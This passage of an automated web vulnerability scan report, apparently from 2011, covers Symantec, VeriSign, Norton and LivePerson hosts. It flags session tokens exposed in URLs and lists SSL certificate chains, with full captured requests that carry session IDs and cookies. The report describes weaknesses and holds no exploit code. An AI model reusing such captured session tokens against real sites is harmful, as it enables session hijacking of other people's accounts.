Content-Length: 716
Cache-Control: public, no-cache
Date: Fri, 09 Sep 2011 21:26:08 GMT
Connection: close

iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn
h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9
kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO
JotiY/UdyOFK+TiH1
...[SNIP]...

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://renewals.symantec.com
Path:   /renewals/images/icon-pop-up.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Length: 60
Content-Type: image/gif
Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT
Accept-Ranges: bytes

GIF89a    .    .....G....!.......,....    .    ......g.....O...U...-G..;

7.10. http://sales.liveperson.net/hc/2735064/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

7.11. https://securitycenter.verisign.com/celp/enroll/retail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:17 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1591
Date: Fri, 09 Sep 2011 21:30:58 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

7.14. http://vipmobile.verisign.com/images/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:04:01 GMT
Server: Apache
Location: http://vipmobile.verisign.com/images/favicon.ico
Content-Length: 328
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.15. https://vipmobile.verisign.com/home.v  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://vipmobile.verisign.com
Path:   /home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:52:05 GMT
Server: Apache
Location: https://vipmobile.verisign.com/home.v
Content-Length: 318
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://vipmobile.veris
...[SNIP]...

8. SSL certificate  previous  next
There are 37 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://fileconnect.symantec.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  FILECONNECT.SYMANTEC.COM
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 07 17:59:59 GMT-06:00 2012

8.2. https://forms.verisign.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  forms.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun May 29 18:00:00 GMT-06:00 2011
Valid to:  Wed May 29 17:59:59 GMT-06:00 2013

8.3. https://knowledge.verisign.ch/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  vrsn-intl.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Jun 08 18:00:00 GMT-06:00 2010
Valid to:  Fri Jun 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.4. https://knowledge.verisign.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  knowledge.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Feb 02 18:00:00 GMT-06:00 2010
Valid to:  Mon Feb 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.5. https://onlinefamily.norton.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.onlinefamily.norton.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Oct 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Oct 06 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.6. https://query.verisign.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  query-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Feb 13 18:00:00 GMT-06:00 2011
Valid to:  Tue Mar 05 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://ssl-certificate-center.verisign.ch/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-emea.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.8. https://ssl-certificate-center.verisign.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.9. https://trust-center.verisign.ch/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-emea.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://trust-center.verisign.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://us.norton.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://us.norton.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.norton.com
Issued by:  USERTrust Legacy Secure Server CA
Valid from:  Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:  Sat May 19 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  USERTrust Legacy Secure Server CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Nov 26 14:33:13 GMT-06:00 2009
Valid to:  Sat Oct 31 22:00:00 GMT-06:00 2015

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.12. https://admin.instantservice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.instantservice.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.instantservice.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Jul 06 18:00:00 GMT-06:00 2011
Valid to:  Fri Jul 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.13. https://buy-static.norton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy-static.norton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy-static.norton.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 11 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
